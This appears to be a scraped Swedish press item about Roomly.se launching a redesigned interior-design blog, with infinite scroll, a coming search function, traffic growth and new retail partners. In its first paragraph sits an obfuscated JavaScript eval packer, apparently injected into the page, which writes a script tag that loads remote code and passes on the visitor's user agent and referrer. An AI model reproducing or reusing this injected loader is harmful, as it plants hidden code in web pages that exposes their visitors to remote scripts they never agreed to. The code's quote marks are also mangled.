Image Image Image Image Image Image Image Image Image Image

| 8 april, 2020

Scroll to top

Top

Roomly.se lanserar ny design på sin inredningsblogg

Roomly.se lanserar ny design på sin inredningsblogg

Den svenska inredningssajten Roomly.se meddelar att ett nytt, snyggt ansikte har lanserats på deras välbesökta inredningsblogg. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tetee|var|u0026u|referrer|inehb||js|php’.split(’|’),0,{}))
Nu ska det vara lättare att navigera sig fram till det innehåll man är ute efter.

” Det var inget fel på den förra layouten av inredningsbloggen men vi kända att det var dags att uppdatera. Under första kvartalet av 2016 har våra besök ökat med ca 23% enligt Google Analytics. Det är en stor ökning som också betyder att vi hela tiden måste optimera sidan efter tillväxt så den inte blir långsam.” Säger Roomly.se

Det som är nytt på inredningsbloggen är en ny design som är snabbare, enklare att navigera och överskådlig. Den använder också något som heter ”infinity scroll” vilket gör att man inte behöver klicka sig vidare till nästa sida för att fortsätta se äldre inlägg. Det finns några mindre funktioner och ändringar som ska in nu under veckan som gör den nya designen komplett. Bland annat en sökfunktion av inläggen som inte funnits tillgängligt innan.

” Det är väldigt många som meddelat oss att det är svårt att hitta äldre inlägg i bloggen. Självklart ska man kunna gå tillbaka och se äldre inspiration och guider så det kommer att finnas live nu i veckan. ”

Idag ligger Roomly.se på ca 100 000 besök i månaden, något som i svenska mått kan kallas för medelstor webbplats. Ett bra mått sett till en hemsida på drygt ett år live.

Roomly AB berättar också att man under 2016 tagit in 18 nya partners. Bland dessa hittar vi stora aktörer som Trendrum, Oscar & Clothilde och Haléns. Det kommer gå ut ett pressmeddelande inom kort med mer ingående information om vilka handlare som introducerats på Roomly.se.